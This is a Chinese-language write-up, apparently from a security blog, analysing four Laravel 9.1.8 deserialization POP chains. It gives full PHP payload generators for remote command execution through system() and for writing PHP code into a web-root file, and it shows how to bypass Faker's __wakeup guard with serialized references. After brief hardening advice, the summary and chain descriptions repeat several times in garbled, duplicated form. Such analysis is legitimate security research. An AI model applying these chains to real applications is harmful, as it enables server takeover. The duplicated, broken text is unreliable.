Laravel 9.1.8 反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Laravel 9.1.8 版本中存在多个反序列化漏洞，攻击者可以通过构造特定的反序列化链实现远程代码执行(RCE)。本文详细分析四个不同的POP(Property-Oriented Programming)链利用方式。<\/p>

环境搭建<\/h2>

下载官方 Laravel 9.1.8 源码<\/li>
执行 composer install<\/code> 安装依赖<\/li>

修改 routes\/web.php<\/code> 添加漏洞触发点：<\/li>
<\/ol>
Route<\/span>::<\/span>get<\/span>('\/'<\/span>, function<\/span> (\Illuminate\Http\Request<\/span> $request) {
<\/span><\/span>    $vuln =<\/span> base64_decode<\/span>($request-><\/span>input<\/span>("vuln"<\/span>));
<\/span><\/span>    unserialize<\/span>($vuln);
<\/span><\/span>    return<\/span> "H3rmesk1t"<\/span>;
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>或直接使用打包好的漏洞环境。<\/p>
POP Chain 1分析<\/h2>
漏洞描述<\/h3>
通过 Illuminate\Broadcasting\PendingBroadcast.php<\/code> 的 __destruct<\/code> 方法和 Illuminate\Bus\QueueingDispatcher.php<\/code> 的 dispatch<\/code> 方法实现RCE。<\/p>
利用链分析<\/h3>


起点：PendingBroadcast::__destruct()<\/code><\/p>

调用 $this->events->dispatch($this->event)<\/code><\/li>
$this->events<\/code> 和 $this->event<\/code> 可控<\/li>
<\/ul>
<\/li>

进入 Dispatcher::dispatch()<\/code><\/p>

调用 dispatchToQueue($command)<\/code><\/li>
$command<\/code> 和 $this->queueResolver<\/code> 可控<\/li>
<\/ul>
<\/li>

关键点：dispatchToQueue()<\/code> 中的 call_user_func<\/code><\/p>

通过 BroadcastEvent<\/code> 控制 $command->connection<\/code><\/li>
$this->queueResolver<\/code> 设置为系统命令执行函数<\/li>
<\/ul>
<\/li>
<\/ol>
利用代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Illuminate\Contracts\Queue<\/span> { interface<\/span> ShouldQueue<\/span> {} }
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Bus<\/span> {
<\/span><\/span>    class<\/span> Dispatcher<\/span> {
<\/span><\/span>        protected<\/span> $container;
<\/span><\/span>        protected<\/span> $pipeline;
<\/span><\/span>        protected<\/span> $pipes =<\/span> [];
<\/span><\/span>        protected<\/span> $handlers =<\/span> [];
<\/span><\/span>        protected<\/span> $queueResolver;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>queueResolver<\/span> =<\/span> "system"<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Broadcasting<\/span> {
<\/span><\/span>    use<\/span> Illuminate\Contracts\Queue\ShouldQueue<\/span>;
<\/span><\/span>    class<\/span> BroadcastEvent<\/span> implements<\/span> ShouldQueue<\/span> {
<\/span><\/span>        function<\/span> __construct() {}
<\/span><\/span>    }
<\/span><\/span>    class<\/span> PendingBroadcast<\/span> {
<\/span><\/span>        protected<\/span> $events;
<\/span><\/span>        protected<\/span> $event;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>event<\/span> =<\/span> new<\/span> BroadcastEvent<\/span>();
<\/span><\/span>            $this-><\/span>event<\/span>-><\/span>connection<\/span> =<\/span> "calc"<\/span>;
<\/span><\/span>            $this-><\/span>events<\/span> =<\/span> new<\/span> \Illuminate\Bus\Dispatcher<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $pop =<\/span> new<\/span> \Illuminate\Broadcasting\PendingBroadcast<\/span>();
<\/span><\/span>    echo<\/span> base64_encode<\/span>(serialize<\/span>($pop));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>POP Chain 2分析<\/h2>
漏洞描述<\/h3>
通过 GuzzleHttp\Cookie\FileCookieJar.php<\/code> 的 __destruct<\/code> 方法实现文件写入。<\/p>
利用链分析<\/h3>


起点：FileCookieJar::__destruct()<\/code><\/p>

调用 $this->save()<\/code><\/li>
$this->filename<\/code> 可控<\/li>
<\/ul>
<\/li>

关键点：save()<\/code> 中的 file_put_contents<\/code><\/p>

通过 SetCookie<\/code> 控制写入内容<\/li>
$this->data['Expires']<\/code> 设置为PHP代码<\/li>
$this->data['Discard']<\/code> 设置为0确保持久化<\/li>
<\/ul>
<\/li>
<\/ol>
利用代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> GuzzleHttp\Cookie<\/span> {
<\/span><\/span>    class<\/span> SetCookie<\/span> {
<\/span><\/span>        private<\/span> static<\/span> $defaults =<\/span> [
<\/span><\/span>            'Name'<\/span> =><\/span> null<\/span>,
<\/span><\/span>            'Value'<\/span> =><\/span> null<\/span>,
<\/span><\/span>            'Domain'<\/span> =><\/span> null<\/span>,
<\/span><\/span>            'Path'<\/span> =><\/span> '\/'<\/span>,
<\/span><\/span>            'Max-Age'<\/span> =><\/span> null<\/span>,
<\/span><\/span>            'Expires'<\/span> =><\/span> null<\/span>,
<\/span><\/span>            'Secure'<\/span> =><\/span> false<\/span>,
<\/span><\/span>            'Discard'<\/span> =><\/span> false<\/span>,
<\/span><\/span>            'HttpOnly'<\/span> =><\/span> false<\/span>
<\/span><\/span>        ];
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>data<\/span>['Expires'<\/span>] =<\/span> '<?php phpinfo();?>'<\/span>;
<\/span><\/span>            $this-><\/span>data<\/span>['Discard'<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    class<\/span> CookieJar<\/span> {
<\/span><\/span>        private<\/span> $cookies =<\/span> [];
<\/span><\/span>        private<\/span> $strictMode;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>cookies<\/span>[] =<\/span> new<\/span> SetCookie<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    class<\/span> FileCookieJar<\/span> extends<\/span> CookieJar<\/span> {
<\/span><\/span>        private<\/span> $filename;
<\/span><\/span>        private<\/span> $storeSessionCookies;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            parent<\/span>::<\/span>__construct<\/span>();
<\/span><\/span>            $this-><\/span>filename<\/span> =<\/span> "C:\/Tools\/phpstudy_pro\/WWW\/laravel9\/public\/info.php"<\/span>;
<\/span><\/span>            $this-><\/span>storeSessionCookies<\/span> =<\/span> true<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $pop =<\/span> new<\/span> \GuzzleHttp\Cookie\FileCookieJar<\/span>();
<\/span><\/span>    echo<\/span> base64_encode<\/span>(serialize<\/span>($pop));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>POP Chain 3分析<\/h2>
漏洞描述<\/h3>
通过绕过 Faker\Generator.php<\/code> 的 __wakeup<\/code> 限制，结合 PendingBroadcast<\/code> 和 Generator<\/code> 的 __call<\/code> 方法实现RCE。<\/p>
绕过技术<\/h3>

Generator::__wakeup()<\/code> 会将 $this->formatters<\/code> 重置为空数组<\/li>
利用PHP引用特性(R:2)使 $this->formatters<\/code> 指向其他属性<\/li>
通过 SMimePart::__wakeup()<\/code> 修改引用目标的值<\/li>
<\/ol>
利用链分析<\/h3>

起点：SMimePart<\/code> 反序列化触发 __wakeup<\/code><\/li>
通过引用绕过 Generator::__wakeup<\/code> 限制<\/li>
最终调用 Generator::__call()<\/code> 执行系统命令<\/li>
<\/ol>
利用代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Faker<\/span> {
<\/span><\/span>    class<\/span> Generator<\/span> {
<\/span><\/span>        protected<\/span> $providers =<\/span> [];
<\/span><\/span>        protected<\/span> $formatters =<\/span> [];
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>formatter<\/span> =<\/span> "dispatch"<\/span>;
<\/span><\/span>            $this-><\/span>formatters<\/span> =<\/span> 9999<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Broadcasting<\/span> {
<\/span><\/span>    class<\/span> PendingBroadcast<\/span> {
<\/span><\/span>        public<\/span> function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>event<\/span> =<\/span> "calc"<\/span>;
<\/span><\/span>            $this-><\/span>events<\/span> =<\/span> new<\/span> \Faker\Generator<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Symfony\Component\Mime\Part<\/span> {
<\/span><\/span>    abstract<\/span> class<\/span> AbstractPart<\/span> {
<\/span><\/span>        private<\/span> $headers =<\/span> null<\/span>;
<\/span><\/span>    }
<\/span><\/span>    class<\/span> SMimePart<\/span> extends<\/span> AbstractPart<\/span> {
<\/span><\/span>        protected<\/span> $_headers;
<\/span><\/span>        public<\/span> $h3rmesk1t;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>_headers<\/span> =<\/span> ["dispatch"<\/span> =><\/span> "system"<\/span>];
<\/span><\/span>            $this-><\/span>h3rmesk1t<\/span> =<\/span> new<\/span> \Illuminate\Broadcasting\PendingBroadcast<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $pop =<\/span> new<\/span> \Symfony\Component\Mime\Part\SMimePart<\/span>();
<\/span><\/span>    $ser =<\/span> preg_replace<\/span>("\/s:49.*<\/span>\"<\/span>dispatch<\/span>\"<\/span>;s:6:<\/span>\"<\/span>system<\/span>\"<\/span>\/"<\/span>, "<\/span>\\<\/span>1<\/span>\\<\/span>3<\/span>\\<\/span>2<\/span>\\<\/span>4"<\/span>, serialize<\/span>($pop));
<\/span><\/span>    echo<\/span> base64_encode<\/span>(str_replace<\/span>("i:9999"<\/span>, "R:2"<\/span>, $ser));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>POP Chain 4分析<\/h2>
漏洞描述<\/h3>
结合 PendingResourceRegistration<\/code> 和绕过后的 Generator<\/code> 实现文件写入。<\/p>
利用链分析<\/h3>

起点：PendingResourceRegistration::__destruct()<\/code><\/li>
调用 $this->registrar->register()<\/code><\/li>
通过 Generator::__call()<\/code> 调用 file_put_contents<\/code><\/li>
控制文件名和内容实现任意文件写入<\/li>
<\/ol>
利用代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> Faker<\/span> {
<\/span><\/span>    class<\/span> Generator<\/span> {
<\/span><\/span>        protected<\/span> $providers =<\/span> [];
<\/span><\/span>        protected<\/span> $formatters =<\/span> [];
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>formatter<\/span> =<\/span> "register"<\/span>;
<\/span><\/span>            $this-><\/span>formatters<\/span> =<\/span> 9999<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Illuminate\Routing<\/span> {
<\/span><\/span>    class<\/span> PendingResourceRegistration<\/span> {
<\/span><\/span>        protected<\/span> $registrar;
<\/span><\/span>        protected<\/span> $name;
<\/span><\/span>        protected<\/span> $controller;
<\/span><\/span>        protected<\/span> $options =<\/span> [];
<\/span><\/span>        protected<\/span> $registered =<\/span> false<\/span>;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>registrar<\/span> =<\/span> new<\/span> \Faker\Generator<\/span>();
<\/span><\/span>            $this-><\/span>name<\/span> =<\/span> "C:\/Tools\/phpstudy_pro\/WWW\/laravel9\/public\/info.php"<\/span>;
<\/span><\/span>            $this-><\/span>controller<\/span> =<\/span> "<?php phpinfo();system('calc');?>"<\/span>;
<\/span><\/span>            $this-><\/span>options<\/span> =<\/span> 8<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Symfony\Component\Mime\Part<\/span> {
<\/span><\/span>    abstract<\/span> class<\/span> AbstractPart<\/span> {
<\/span><\/span>        private<\/span> $headers =<\/span> null<\/span>;
<\/span><\/span>    }
<\/span><\/span>    class<\/span> SMimePart<\/span> extends<\/span> AbstractPart<\/span> {
<\/span><\/span>        protected<\/span> $_headers;
<\/span><\/span>        public<\/span> $h3rmesk1t;
<\/span><\/span>        function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>_headers<\/span> =<\/span> ["register"<\/span> =><\/span> "file_put_contents"<\/span>];
<\/span><\/span>            $this-><\/span>h3rmesk1t<\/span> =<\/span> new<\/span> \Illuminate\Routing\PendingResourceRegistration<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $pop =<\/span> new<\/span> \Symfony\Component\Mime\Part\SMimePart<\/span>();
<\/span><\/span>    $ser =<\/span> preg_replace<\/span>("\/s:49.*<\/span>\"<\/span>register<\/span>\"<\/span>;s:15:<\/span>\"<\/span>file_put_contents<\/span>\"<\/span>\/"<\/span>, "<\/span>\\<\/span>1<\/span>\\<\/span>3<\/span>\\<\/span>2<\/span>\\<\/span>4"<\/span>, serialize<\/span>($pop));
<\/span><\/span>    echo<\/span> base64_encode<\/span>(str_replace<\/span>("i:9999"<\/span>, "R:2"<\/span>, $ser));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>防护建议<\/h2>

升级到最新版本的Laravel<\/li>
避免反序列化用户可控的数据<\/li>
使用白名单验证反序列化类<\/li>
实现 __wakeup()<\/code> 或 __destruct()<\/code> 方法时进行安全检查<\/li>
<\/ol>
总结<\/h2>
本文详细分析了Laravel 9.1.8中的四个反序列化漏洞利用链，展示了如何通过精心构造的序列化数据实现远程代码执行或文件写入。这些漏洞的核心在于不安全的反序列化操作与PHP对象属性操控的结合利用。<\/p>

Laravel 9.1.8 反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Laravel 9.1.8 版本中存在多个反序列化漏洞，攻击者可以通过构造特定的反序列化链实现远程代码执行(RCE)。本文详细分析四个不同的POP(Property-Oriented Programming)链利用方式。<\/p>

POP Chain 1分析<\/h2>

漏洞描述<\/h3>
通过 `Illuminate\Broadcasting\PendingBroadcast.php<\/code> 的 __destruct<\/code> 方法和 Illuminate\Bus\QueueingDispatcher.php<\/code> 的 dispatch<\/code> 方法实现RCE。<\/p>`

POP Chain 2分析<\/h2>

漏洞描述<\/h3>
通过 `GuzzleHttp\Cookie\FileCookieJar.php<\/code> 的 __destruct<\/code> 方法实现文件写入。<\/p>`

POP Chain 3分析<\/h2>

漏洞描述<\/h3>
通过绕过 `Faker\Generator.php<\/code> 的 wakeup<\/code> 限制，结合 PendingBroadcast<\/code> 和 Generator<\/code> 的 call<\/code> 方法实现RCE。<\/p>`

POP Chain 4分析<\/h2>

漏洞描述<\/h3>
结合 `PendingResourceRegistration<\/code> 和绕过后的 Generator<\/code> 实现文件写入。<\/p>`

总结<\/h2>
本文详细分析了Laravel 9.1.8中的四个反序列化漏洞利用链，展示了如何通过精心构造的序列化数据实现远程代码执行或文件写入。这些漏洞的核心在于不安全的反序列化操作与PHP对象属性操控的结合利用。<\/p>

Laravel 9.1.8 反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2> Laravel 9.1.8 版本中存在多个反序列化漏洞，攻击者可以通过构造特定的反序列化链实现远程代码执行(RCE)。本文详细分析四个不同的POP(Property-Oriented Programming)链利用方式。<\/p>

POP Chain 1分析<\/h2>

漏洞描述<\/h3> 通过 Illuminate\Broadcasting\PendingBroadcast.php<\/code> 的 __destruct<\/code> 方法和 Illuminate\Bus\QueueingDispatcher.php<\/code> 的 dispatch<\/code> 方法实现RCE。<\/p>

POP Chain 2分析<\/h2>

漏洞描述<\/h3> 通过 GuzzleHttp\Cookie\FileCookieJar.php<\/code> 的 __destruct<\/code> 方法实现文件写入。<\/p>

POP Chain 3分析<\/h2>

漏洞描述<\/h3> 通过绕过 Faker\Generator.php<\/code> 的 __wakeup<\/code> 限制，结合 PendingBroadcast<\/code> 和 Generator<\/code> 的 __call<\/code> 方法实现RCE。<\/p>

POP Chain 4分析<\/h2>

漏洞描述<\/h3> 结合 PendingResourceRegistration<\/code> 和绕过后的 Generator<\/code> 实现文件写入。<\/p>

总结<\/h2> 本文详细分析了Laravel 9.1.8中的四个反序列化漏洞利用链，展示了如何通过精心构造的序列化数据实现远程代码执行或文件写入。这些漏洞的核心在于不安全的反序列化操作与PHP对象属性操控的结合利用。<\/p>

漏洞概述<\/h2>
Laravel 9.1.8 版本中存在多个反序列化漏洞，攻击者可以通过构造特定的反序列化链实现远程代码执行(RCE)。本文详细分析四个不同的POP(Property-Oriented Programming)链利用方式。<\/p>

漏洞描述<\/h3>
通过 `Illuminate\Broadcasting\PendingBroadcast.php<\/code> 的 __destruct<\/code> 方法和 Illuminate\Bus\QueueingDispatcher.php<\/code> 的 dispatch<\/code> 方法实现RCE。<\/p>`

漏洞描述<\/h3>
通过 `GuzzleHttp\Cookie\FileCookieJar.php<\/code> 的 __destruct<\/code> 方法实现文件写入。<\/p>`

漏洞描述<\/h3>
通过绕过 `Faker\Generator.php<\/code> 的 wakeup<\/code> 限制，结合 PendingBroadcast<\/code> 和 Generator<\/code> 的 call<\/code> 方法实现RCE。<\/p>`

漏洞描述<\/h3>
结合 `PendingResourceRegistration<\/code> 和绕过后的 Generator<\/code> 实现文件写入。<\/p>`

总结<\/h2>
本文详细分析了Laravel 9.1.8中的四个反序列化漏洞利用链，展示了如何通过精心构造的序列化数据实现远程代码执行或文件写入。这些漏洞的核心在于不安全的反序列化操作与PHP对象属性操控的结合利用。<\/p>